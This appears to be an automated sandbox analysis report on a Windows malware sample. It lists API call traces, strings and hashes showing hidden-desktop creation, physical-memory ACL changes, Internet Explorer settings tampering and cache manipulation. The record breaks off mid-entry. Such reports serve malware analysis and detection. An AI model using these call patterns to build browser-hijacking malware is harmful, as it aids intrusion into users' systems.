                            • Source File: 00000002.00000002.1981974586.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000002.00000002.1981915377.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                            • Associated: 00000002.00000002.1982006776.000000000042A000.00000004.00000001.01000000.00000005.sdmp
                            • Associated: 00000002.00000002.1982081281.000000000042E000.00000020.00000001.01000000.00000005.sdmp
                            • Associated: 00000002.00000002.1982109328.000000000042F000.00000002.00000001.01000000.00000005.sdmp
                            • Associated: 00000002.00000002.1982129135.0000000000436000.00000020.00000001.01000000.00000005.sdmp
                            • Associated: 00000002.00000002.1982146402.0000000000438000.00000002.00000001.01000000.00000005.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_Ogjdllpi.jbxd
                            Similarity
                            • API ID: lstrlen$Thread$AllocCloseCodeCreateExitHandleLocalObjectSingleWaitmemcpy
                            • String ID:
                            • API String ID: 2845097592-0
                            • Opcode ID: 7ec933356805a86d395f76af41b9b2d9f18e99f1d3eeeb5c371ae48cad7448a7
                            • Instruction ID: 017c82820a2f145177c9e28e2e3f5c0bebc6ad2cdfe5315ab2aa4ad5daf85086
                            • Opcode Fuzzy Hash: 7ec933356805a86d395f76af41b9b2d9f18e99f1d3eeeb5c371ae48cad7448a7
                            • Instruction Fuzzy Hash: 5E31D721A04159BACF01DFA6CC01AAEB7F9AF44318F144476F904E7291E63CDB15C7A9
                            APIs
                            • lstrlenA.KERNEL32(?), ref: 00405F73
                            • lstrlenA.KERNEL32(?,?), ref: 00405F7E
                            • LocalAlloc.KERNEL32(00000040,?,?,?), ref: 00405F8D
                            • lstrlenA.KERNEL32(?,00000000,?,00000040,?,?,?), ref: 00405FA2
                            • DeleteUrlCacheEntry.WININET(?), ref: 00405FB5
                            • CreateThread.KERNEL32(00000000,00000000,Function_00005C09,00000000,00000000,?), ref: 00405FCA
                            • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00000000,Function_00005C09,00000000,00000000,?,00000001,?,?,00000000,?,00000040,?,?), ref: 00405FDD
                            • GetExitCodeThread.KERNEL32(00000000,?,00000000,000000FF,00000000,00000000,Function_00005C09,00000000,00000000,?,00000001,?,?,00000000,?,00000040), ref: 00405FE7
                            • CloseHandle.KERNEL32(00000000,00000000,?,00000000,000000FF,00000000,00000000,Function_00005C09,00000000,00000000,?,00000001,?,?,00000000,?), ref: 00405FED
                            Memory Dump Source
                            • Source File: 00000002.00000002.1981974586.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000002.00000002.1981915377.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                            • Associated: 00000002.00000002.1982006776.000000000042A000.00000004.00000001.01000000.00000005.sdmp
                            • Associated: 00000002.00000002.1982081281.000000000042E000.00000020.00000001.01000000.00000005.sdmp
                            • Associated: 00000002.00000002.1982109328.000000000042F000.00000002.00000001.01000000.00000005.sdmp
                            • Associated: 00000002.00000002.1982129135.0000000000436000.00000020.00000001.01000000.00000005.sdmp
                            • Associated: 00000002.00000002.1982146402.0000000000438000.00000002.00000001.01000000.00000005.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_Ogjdllpi.jbxd
                            Similarity
                            • API ID: lstrlen$Thread$AllocCacheCloseCodeCreateDeleteEntryExitHandleLocalObjectSingleWait
                            • String ID:
                            • API String ID: 794401840-0
                            • Opcode ID: 03fc3e79f5e594bfaf1f893bda151e66fa8c5b5e213fcd764589a016d7372ae4
                            • Instruction ID: 5ee1198a60b0fc2a8532ff5616a25e8349e08cf473eab22e95dc85017e90c3ca
                            • Opcode Fuzzy Hash: 03fc3e79f5e594bfaf1f893bda151e66fa8c5b5e213fcd764589a016d7372ae4
                            • Instruction Fuzzy Hash: B011CA71A082447BD701F6668C42EAFB76DDF85368F144476F600B71C2D678AF0147E9
                            APIs
                            • GetSecurityInfo.ADVAPI32(?,00000006,?,00000000,00000000,?,00000000,?), ref: 00402976
                            • SetEntriesInAclA.ADVAPI32(00000001,00000002,?,?), ref: 00402988
                            • SetSecurityInfo.ADVAPI32(?,00000006,?,00000000,00000000,?,00000000,?,00000006,?,00000000,00000000,?,00000000,?), ref: 004029A3
                            • CloseHandle.KERNEL32(?,?,00000006,?,00000000,00000000,?,00000000,?,00000006,?,00000000,00000000,?,00000000,?), ref: 004029B1
                            Memory Dump Source
                            • Source File: 00000002.00000002.1981974586.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000002.00000002.1981915377.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                            • Associated: 00000002.00000002.1982006776.000000000042A000.00000004.00000001.01000000.00000005.sdmp
                            • Associated: 00000002.00000002.1982081281.000000000042E000.00000020.00000001.01000000.00000005.sdmp
                            • Associated: 00000002.00000002.1982109328.000000000042F000.00000002.00000001.01000000.00000005.sdmp
                            • Associated: 00000002.00000002.1982129135.0000000000436000.00000020.00000001.01000000.00000005.sdmp
                            • Associated: 00000002.00000002.1982146402.0000000000438000.00000002.00000001.01000000.00000005.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_Ogjdllpi.jbxd
                            Similarity
                            • API ID: InfoSecurity$CloseEntriesHandle
                            • String ID: @$CURRENT_USER$\device\physicalmemory
                            • API String ID: 405656561-3357994103
                            • Opcode ID: 3f106b48de9bb5ba9ca254209248b2c107f34978da584956db3145db2ea5644b
                            • Instruction ID: 89d45d45e0a184fa7970b295066ffccd564a705ae1855cc5323f3f658fcd5c06
                            • Opcode Fuzzy Hash: 3f106b48de9bb5ba9ca254209248b2c107f34978da584956db3145db2ea5644b
                            • Instruction Fuzzy Hash: 2A41EB71E4030DAFEB108FD4DC85BEEB7B9FB04319F50403AEA00BA191D7B9595A8B59
                            APIs
                            • sprintf.CRTDLL(?,SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%u,00000000), ref: 004050CD
                            Strings
                            • BrowseNewProcess, xrefs: 00405113
                            • 1601, xrefs: 004050D4
                            • SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%u, xrefs: 004050C1
                            • yes, xrefs: 0040510E
                            • .DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BrowseNewProcess, xrefs: 00405118
                            • Software\Microsoft\Windows\CurrentVersion\Internet Settings, xrefs: 004050FF
                            • GlobalUserOffline, xrefs: 004050FA
                            Memory Dump Source
                            • Source File: 00000002.00000002.1981974586.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000002.00000002.1981915377.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                            • Associated: 00000002.00000002.1982006776.000000000042A000.00000004.00000001.01000000.00000005.sdmp
                            • Associated: 00000002.00000002.1982081281.000000000042E000.00000020.00000001.01000000.00000005.sdmp
                            • Associated: 00000002.00000002.1982109328.000000000042F000.00000002.00000001.01000000.00000005.sdmp
                            • Associated: 00000002.00000002.1982129135.0000000000436000.00000020.00000001.01000000.00000005.sdmp
                            • Associated: 00000002.00000002.1982146402.0000000000438000.00000002.00000001.01000000.00000005.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_Ogjdllpi.jbxd
                            Similarity
                            • API ID: sprintf
                            • String ID: .DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BrowseNewProcess$1601$BrowseNewProcess$GlobalUserOffline$SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%u$Software\Microsoft\Windows\CurrentVersion\Internet Settings$yes
                            • API String ID: 590974362-546450379
                            • Opcode ID: ad57bd7a5e5ee7174c091d0a3ea72984deb32bb5560bbbda773b8a609c7be674
                            • Instruction ID: cd0aaffbc0bd71aa605591c0976343fec0ffbebd6d6d4fedce8ce2f9217411d7
                            • Opcode Fuzzy Hash: ad57bd7a5e5ee7174c091d0a3ea72984deb32bb5560bbbda773b8a609c7be674
                            • Instruction Fuzzy Hash: 24F07DF2F883587EE710A1699C47F8D765907A1704FA400A7BA44B10C2D0FE56C6826D
                            Memory Dump Source
                            • Source File: 00000002.00000002.1981974586.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000002.00000002.1981915377.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                            • Associated: 00000002.00000002.1982006776.000000000042A000.00000004.00000001.01000000.00000005.sdmp
                            • Associated: 00000002.00000002.1982081281.000000000042E000.00000020.00000001.01000000.00000005.sdmp
                            • Associated: 00000002.00000002.1982109328.000000000042F000.00000002.00000001.01000000.00000005.sdmp
                            • Associated: 00000002.00000002.1982129135.0000000000436000.00000020.00000001.01000000.00000005.sdmp
                            • Associated: 00000002.00000002.1982146402.0000000000438000.00000002.00000001.01000000.00000005.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_Ogjdllpi.jbxd
                            Similarity
                            • API ID: Focus$CallProcWindow
                            • String ID:
                            • API String ID: 2401821148-0
                            • Opcode ID: 92e1ce8f7ee7a46a278bda77c005b4e0a5389e500612bd3ca87d360d572643d3
                            • Instruction ID: 67d25c2989ca0d32993d4aa71a0b11dc39683739a3ff9c0c7d6bcfde353c753a
                            • Opcode Fuzzy Hash: 92e1ce8f7ee7a46a278bda77c005b4e0a5389e500612bd3ca87d360d572643d3
                            • Instruction Fuzzy Hash: 6F318233E082149BDF21FB29ED848DA7726A751324715C43AE550B32B1DB787C91CB6E
                            APIs
                            • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000), ref: 004036D7
                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,C0000000,00000000,00000000,?,00000080,00000000), ref: 004036F4
                            • WriteFile.KERNEL32(00000000,?,?,?,00000000,00000000,00000000,00000000,00000002,?,C0000000,00000000,00000000,?,00000080,00000000), ref: 00403715
                            • WriteFile.KERNEL32(00000000,0042CC6C,00000002,?,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000002,?,C0000000), ref: 00403728
                            • CloseHandle.KERNEL32(00000000,00000000,0042CC6C,00000002,?,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000002,?), ref: 00403734
                            Memory Dump Source
                            • Source File: 00000002.00000002.1981974586.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000002.00000002.1981915377.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                            • Associated: 00000002.00000002.1982006776.000000000042A000.00000004.00000001.01000000.00000005.sdmp
                            • Associated: 00000002.00000002.1982081281.000000000042E000.00000020.00000001.01000000.00000005.sdmp
                            • Associated: 00000002.00000002.1982109328.000000000042F000.00000002.00000001.01000000.00000005.sdmp
                            • Associated: 00000002.00000002.1982129135.0000000000436000.00000020.00000001.01000000.00000005.sdmp
                            • Associated: 00000002.00000002.1982146402.0000000000438000.00000002.00000001.01000000.00000005.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_Ogjdllpi.jbxd
                            Similarity
                            • API ID: File$Write$CloseCreateHandlePointer
                            • String ID: Y&-v
                            • API String ID: 2529654636-852306816
                            • Opcode ID: 1a2ee31b6e64b1819939f0b424d9492dfa5bc2d8a36479f3b8c11624ee1f3d36
                            • Instruction ID: 393fb1fac6dfb6d7043d4134058e676a256c67ba5a84656a07003a75d011006f
                            • Opcode Fuzzy Hash: 1a2ee31b6e64b1819939f0b424d9492dfa5bc2d8a36479f3b8c11624ee1f3d36
                            • Instruction Fuzzy Hash: A401A772B4461439F62165758C43F9E365D8B41B78F208136F711BB1C1D6F97E0142BD
                            APIs
                            • FindFirstUrlCacheEntryA.WININET(*.*,?,00001F40), ref: 00405654
                            • _stricmp.CRTDLL(?,?), ref: 00405679
                            • FindNextUrlCacheEntryA.WININET(00000000,?,00001F40), ref: 004056C0
                            • _stricmp.CRTDLL(?,?), ref: 004056D6
                            Memory Dump Source
                            • Source File: 00000002.00000002.1981974586.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000002.00000002.1981915377.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                            • Associated: 00000002.00000002.1982006776.000000000042A000.00000004.00000001.01000000.00000005.sdmp
                            • Associated: 00000002.00000002.1982081281.000000000042E000.00000020.00000001.01000000.00000005.sdmp
                            • Associated: 00000002.00000002.1982109328.000000000042F000.00000002.00000001.01000000.00000005.sdmp
                            • Associated: 00000002.00000002.1982129135.0000000000436000.00000020.00000001.01000000.00000005.sdmp
                            • Associated: 00000002.00000002.1982146402.0000000000438000.00000002.00000001.01000000.00000005.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_Ogjdllpi.jbxd
                            Similarity
                            • API ID: CacheEntryFind_stricmp$FirstNext
                            • String ID: *.*
                            • API String ID: 747601842-438819550
                            • Opcode ID: ba5afd5151c0520d6d715a10c5df759dc41a82144f0bc2f8a3a4ef8e8a54dfaf
                            • Instruction ID: aa6d97de36eacb02400b0bc5d5be45fc0d4f636131057f9c0ab70f2a458f06eb
                            • Opcode Fuzzy Hash: ba5afd5151c0520d6d715a10c5df759dc41a82144f0bc2f8a3a4ef8e8a54dfaf
                            • Instruction Fuzzy Hash: AD21CF72E1005AABCB109A65CC018FBB6EEEB44398F1404F3F108F7290EB799E418F65
                            APIs
                            • GetCurrentThreadId.KERNEL32 ref: 00404341
                            • GetThreadDesktop.USER32(00000000), ref: 00404347
                            • CreateDesktopA.USER32(blind_user,00000000,00000000,00000000,000000C7,00000000), ref: 00404376
                            • SetThreadDesktop.USER32 ref: 00404394
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.1981974586.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000002.00000002.1981915377.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                            • Associated: 00000002.00000002.1982006776.000000000042A000.00000004.00000001.01000000.00000005.sdmp
                            • Associated: 00000002.00000002.1982081281.000000000042E000.00000020.00000001.01000000.00000005.sdmp
                            • Associated: 00000002.00000002.1982109328.000000000042F000.00000002.00000001.01000000.00000005.sdmp
                            • Associated: 00000002.00000002.1982129135.0000000000436000.00000020.00000001.01000000.00000005.sdmp
                            • Associated: 00000002.00000002.1982146402.0000000000438000.00000002.00000001.01000000.00000005.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_Ogjdllpi.jbxd
                            Yara matches
                            Similarity
                            • API ID: DesktopThread$CreateCurrent
                            • String ID: blind_user
                            • API String ID: 2384851093-487808672
                            • Opcode ID: f5dbc74db38e7769b0145d7bd92762358955ae931e1e69e9e23be6df9a4e239d
                            • Instruction ID: 282a6fb7077f79b337956a50597d570250b08ff90f4541f666399335e01d3b83
                            • Opcode Fuzzy Hash: f5dbc74db38e7769b0145d7bd92762358955ae931e1e69e9e23be6df9a4e239d
                            • Instruction Fuzzy Hash: 2C018471B442006FDB14B73E9C5276FA6D95BC0314F64403BA602F72D0E9B899018A5D
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.1981974586.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000002.00000002.1981915377.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                            • Associated: 00000002.00000002.1982006776.000000000042A000.00000004.00000001.01000000.00000005.sdmp
                            • Associated: 00000002.00000002.1982081281.000000000042E000.00000020.00000001.01000000.00000005.sdmp
                            • Associated: 00000002.00000002.1982109328.000000000042F000.00000002.00000001.01000000.00000005.sdmp
                            • Associated: 00000002.00000002.1982129135.0000000000436000.00000020.00000001.01000000.00000005.sdmp
                            • Associated: 00000002.00000002.1982146402.0000000000438000.00000002.00000001.01000000.00000005.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_Ogjdllpi.jbxd
                            Yara matches
                            Similarity
                            • API ID: printf
                            • String ID: %02X $HEX:
                            • API String ID: 3524737521-2568639716
                            • Opcode ID: 20ec43f9d3281b237926bfbb5e092365326a766f922892e0b88cafedccc6c182
                            • Instruction ID: 8eff4c8c66366255d0771bcdb7d8d21a427f9234d78b176c67630138abebef86
                            • Opcode Fuzzy Hash: 20ec43f9d3281b237926bfbb5e092365326a766f922892e0b88cafedccc6c182
                            • Instruction Fuzzy Hash: 43F0E972F05214BBD704DB9ADC4286E77A9DB9236473080FBF804631C0E9755F0086A9
                            APIs
                            • memset.CRTDLL(?,00000090,00000008,56CC39D8,-0042AA50,297D09F2,00000000), ref: 00403C8B
                            • memcpy.CRTDLL(?,-0042AA50,00000000,?,00000090,00000008,56CC39D8,-0042AA50,297D09F2,00000000), ref: 00403CAE
                            • memcpy.CRTDLL(-0042AA50,?,00000006,?,-0042AA50,00000000,?,00000090,00000008,56CC39D8,-0042AA50,297D09F2,00000000), ref: 00403CBE
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.1981974586.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000002.00000002.1981915377.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                            • Associated: 00000002.00000002.1982006776.000000000042A000.00000004.00000001.01000000.00000005.sdmp
                            • Associated: 00000002.00000002.1982081281.000000000042E000.00000020.00000001.01000000.00000005.sdmp
                            • Associated: 00000002.00000002.1982109328.000000000042F000.00000002.00000001.01000000.00000005.sdmp
                            • Associated: 00000002.00000002.1982129135.0000000000436000.00000020.00000001.01000000.00000005.sdmp
                            • Associated: 00000002.00000002.1982146402.0000000000438000.00000002.00000001.01000000.00000005.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_Ogjdllpi.jbxd
                            Yara matches
                            Similarity
                            • API ID: memcpy$memset
                            • String ID: MC
                            • API String ID: 438689982-3957011357
                            • Opcode ID: 17c6be56fc60e202b714f164ab6214ad707b693cbc1fda5e6d8626b4e57840bc
                            • Instruction ID: 0fabd55d67194886af3b95eda558b9f651b3b184c5d0290ca09bafd6d30b71fa
                            • Opcode Fuzzy Hash: 17c6be56fc60e202b714f164ab6214ad707b693cbc1fda5e6d8626b4e57840bc
                            • Instruction Fuzzy Hash: F131B661F08198AFDB00DFBDC84169EBFFA9B4A210F1480B6E884F7381D5789F059765
                            APIs
                            • CoInitialize.OLE32(00000000), ref: 004017CC
                            • CLSIDFromString.OLE32({9BA05972-F6A8-11CF-A442-00A0C90A8F39},?), ref: 004017DA
                            • CoCreateInstance.OLE32(?,00000000,?,0042CD50,?,{9BA05972-F6A8-11CF-A442-00A0C90A8F39},?), ref: 00401803
                            Strings
                            • {9BA05972-F6A8-11CF-A442-00A0C90A8F39} (CLSID_ShellWindows, the COM collection of open Explorer and Internet Explorer windows), xrefs: 004017D5
                            Memory Dump Source
                            • Source File: 00000002.00000002.1981974586.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000002.00000002.1981915377.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                            • Associated: 00000002.00000002.1982006776.000000000042A000.00000004.00000001.01000000.00000005.sdmp
                            • Associated: 00000002.00000002.1982081281.000000000042E000.00000020.00000001.01000000.00000005.sdmp
                            • Associated: 00000002.00000002.1982109328.000000000042F000.00000002.00000001.01000000.00000005.sdmp
                            • Associated: 00000002.00000002.1982129135.0000000000436000.00000020.00000001.01000000.00000005.sdmp
                            • Associated: 00000002.00000002.1982146402.0000000000438000.00000002.00000001.01000000.00000005.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_Ogjdllpi.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateFromInitializeInstanceString
                            • String ID: {9BA05972-F6A8-11CF-A442-00A0C90A8F39}
                            • API String ID: 1245325315-1222218007
                            • Opcode ID: 374fb238f9a8af98a0c272c884aa5e7a000c0b0753857630dac3c0af84d03f4f
                            • Instruction ID: 52c0c8d8f8a1b88d6522b4dea913535513547713cd70a2aa0dd21656c7656eb5
                            • Opcode Fuzzy Hash: 374fb238f9a8af98a0c272c884aa5e7a000c0b0753857630dac3c0af84d03f4f
                            • Instruction Fuzzy Hash: E1118673B102116FE710FEF5DC81BAB7AE89B00355F10483BE644F32D1E6B8A50286B9
                            APIs
                            Memory Dump Source
                            • Source File: 00000002.00000002.1981974586.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000002.00000002.1981915377.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                            • Associated: 00000002.00000002.1982006776.000000000042A000.00000004.00000001.01000000.00000005.sdmp
                            • Associated: 00000002.00000002.1982081281.000000000042E000.00000020.00000001.01000000.00000005.sdmp
                            • Associated: 00000002.00000002.1982109328.000000000042F000.00000002.00000001.01000000.00000005.sdmp
                            • Associated: 00000002.00000002.1982129135.0000000000436000.00000020.00000001.01000000.00000005.sdmp
                            • Associated: 00000002.00000002.1982146402.0000000000438000.00000002.00000001.01000000.00000005.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_Ogjdllpi.jbxd
                            Yara matches
                            Similarity
                            • API ID: signal$raise
                            • String ID:
                            • API String ID: 372037113-0
                            • Opcode ID: 2d1ef5de37ea69ebb4b8d4bb24db1da757c13c860f6842aad27d4f5ac914ae12
                            • Instruction ID: baa5ba32779064c34a5af0890878b5a2dbb5619b613b0807c362cc876063d63b
                            • Opcode Fuzzy Hash: 2d1ef5de37ea69ebb4b8d4bb24db1da757c13c860f6842aad27d4f5ac914ae12
                            • Instruction Fuzzy Hash: 4541B475A01204DFC720DF18EC84B5677B4FB08350F44457AEE14AB3E1E734A965CBAA
                            APIs
                            • lstrlenA.KERNEL32(?), ref: 00404492
                            • LocalAlloc.KERNEL32(00000040,-00000008,?), ref: 004044A4
                            • sprintf.CRTDLL(?,%s%c%c,?,4EC4EBEE,?,00000040,-00000008,?), ref: 00404515
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.1981974586.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000002.00000002.1981915377.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                            • Associated: 00000002.00000002.1982006776.000000000042A000.00000004.00000001.01000000.00000005.sdmp
                            • Associated: 00000002.00000002.1982081281.000000000042E000.00000020.00000001.01000000.00000005.sdmp
                            • Associated: 00000002.00000002.1982109328.000000000042F000.00000002.00000001.01000000.00000005.sdmp
                            • Associated: 00000002.00000002.1982129135.0000000000436000.00000020.00000001.01000000.00000005.sdmp
                            • Associated: 00000002.00000002.1982146402.0000000000438000.00000002.00000001.01000000.00000005.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_Ogjdllpi.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocLocallstrlensprintf
                            • String ID: %s%c%c
                            • API String ID: 2176257816-3118753097
                            • Opcode ID: 3bea807363c46ff2eeabd7410228c447bcb65eafde6f1461acbb5ea9ba8cf64b
                            • Instruction ID: 40b1eb1d73d9c04af9a72cf5af1a140bd4a75b2e1492408562adfdfa8721cd8f
                            • Opcode Fuzzy Hash: 3bea807363c46ff2eeabd7410228c447bcb65eafde6f1461acbb5ea9ba8cf64b
                            • Instruction Fuzzy Hash: F9110B72E0406867DB009A9A88815AFFBB69FC5310F1641F7EA04B73C1D27CAD0193A5
                            APIs
                            • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,00020006,00000000,?,?,4FB14922), ref: 00404255
                            • RegSetValueExA.ADVAPI32(?,4FB14922,00000000,00000000,?,?,?,?,00000000,00000000,00000000,00020006,00000000,?,?,4FB14922), ref: 00404273
                            • RegCloseKey.ADVAPI32(?,?,4FB14922,00000000,00000000,?,?,?,?,00000000,00000000,00000000,00020006,00000000,?,?), ref: 0040427F
                            Memory Dump Source
                            • Source File: 00000002.00000002.1981974586.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000002.00000002.1981915377.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                            • Associated: 00000002.00000002.1982006776.000000000042A000.00000004.00000001.01000000.00000005.sdmp
                            • Associated: 00000002.00000002.1982081281.000000000042E000.00000020.00000001.01000000.00000005.sdmp
                            • Associated: 00000002.00000002.1982109328.000000000042F000.00000002.00000001.01000000.00000005.sdmp
                            • Associated: 00000002.00000002.1982129135.0000000000436000.00000020.00000001.01000000.00000005.sdmp
                            • Associated: 00000002.00000002.1982146402.0000000000438000.00000002.00000001.01000000.00000005.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_Ogjdllpi.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseCreateValue
                            • String ID:
                            • API String ID: 1818849710-0
                            • Opcode ID: 65498cc65565106dc5b66ff6a4b4d842dc0e77ec129b82882a45272a282f6444
                            • Instruction ID: d96ef7c4080a9b633a5bca21bfcbc2c766a155132064e5ed691f16c3214ccdec
                            • Opcode Fuzzy Hash: 65498cc65565106dc5b66ff6a4b4d842dc0e77ec129b82882a45272a282f6444
                            • Instruction Fuzzy Hash: B801F772B10109BBCF11AEB5CC02F9EBEBA9F84340F240476B704F61E0D675D9116718
                            APIs
                            • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 004042D3
                            • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,?,?,00000000,00020019,?), ref: 004042EF
                            • RegCloseKey.ADVAPI32(?,?,?,00000000,00000000,?,?,?,?,00000000,00020019,?), ref: 004042FB
                            Memory Dump Source
                            • Source File: 00000002.00000002.1981974586.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000002.00000002.1981915377.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                            • Associated: 00000002.00000002.1982006776.000000000042A000.00000004.00000001.01000000.00000005.sdmp
                            • Associated: 00000002.00000002.1982081281.000000000042E000.00000020.00000001.01000000.00000005.sdmp
                            • Associated: 00000002.00000002.1982109328.000000000042F000.00000002.00000001.01000000.00000005.sdmp
                            • Associated: 00000002.00000002.1982129135.0000000000436000.00000020.00000001.01000000.00000005.sdmp
                            • Associated: 00000002.00000002.1982146402.0000000000438000.00000002.00000001.01000000.00000005.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_Ogjdllpi.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseOpenQueryValue
                            • String ID:
                            • API String ID: 3677997916-0
                            • Opcode ID: 357a631b938b58c4fbb87905ba1aa3de6a3adf1b78dd9d8722630d207e2470c7
                            • Instruction ID: 691f158720e2b36127ee9bd81ba90e70b5a5535aabeb9bf87ba7554e5ddc9d88
                            • Opcode Fuzzy Hash: 357a631b938b58c4fbb87905ba1aa3de6a3adf1b78dd9d8722630d207e2470c7
                            • Instruction Fuzzy Hash: 9801F271B1410ABACF109E25CC02BEEBFA99F94390F140472BE04F61E1D374EE11A3A9
                            APIs
                            • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000), ref: 00403769
                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,C0000000,00000000,00000000,?,00000080,00000000), ref: 00403780
                            • WriteFile.KERNEL32(00000000,?,?,?,00000000,00000000,00000000,00000000,00000002,?,C0000000,00000000,00000000,?,00000080,00000000), ref: 00403798
                            • CloseHandle.KERNEL32(00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000002,?,C0000000,00000000,00000000,?,00000080), ref: 0040379E
                            Memory Dump Source
                            • Source File: 00000002.00000002.1981974586.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000002.00000002.1981915377.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                            • Associated: 00000002.00000002.1982006776.000000000042A000.00000004.00000001.01000000.00000005.sdmp
                            • Associated: 00000002.00000002.1982081281.000000000042E000.00000020.00000001.01000000.00000005.sdmp
                            • Associated: 00000002.00000002.1982109328.000000000042F000.00000002.00000001.01000000.00000005.sdmp
                            • Associated: 00000002.00000002.1982129135.0000000000436000.00000020.00000001.01000000.00000005.sdmp
                            • Associated: 00000002.00000002.1982146402.0000000000438000.00000002.00000001.01000000.00000005.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_Ogjdllpi.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$CloseCreateHandlePointerWrite
                            • String ID:
                            • API String ID: 3604237281-0
                            • Opcode ID: dac2396c127bae0588a020e64ec8d65c8c20fafefb6c849fc3be04b1fb147846
                            • Instruction ID: cf1cf3c615f6ac6775c7614bbea78a1f327309af87cada33f382846b8ae172d8
                            • Opcode Fuzzy Hash: dac2396c127bae0588a020e64ec8d65c8c20fafefb6c849fc3be04b1fb147846
                            • Instruction Fuzzy Hash: 1BF0E972B442143AE62029758C03FDE355D8B41B78F144131FB10FB1D1D5B8BA0142AD
                            APIs
                            • GetWindowTextA.USER32(?,?,?), ref: 004018E2
                            • _sleep.CRTDLL(00000000), ref: 00401985
                            Strings
                            • Microsoft Internet Explorer, xrefs: 004018E9
                            Memory Dump Source
                            • Source File: 00000002.00000002.1981974586.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000002.00000002.1981915377.0000000000400000.00000002.00000001.01000000.00000005.sdmp
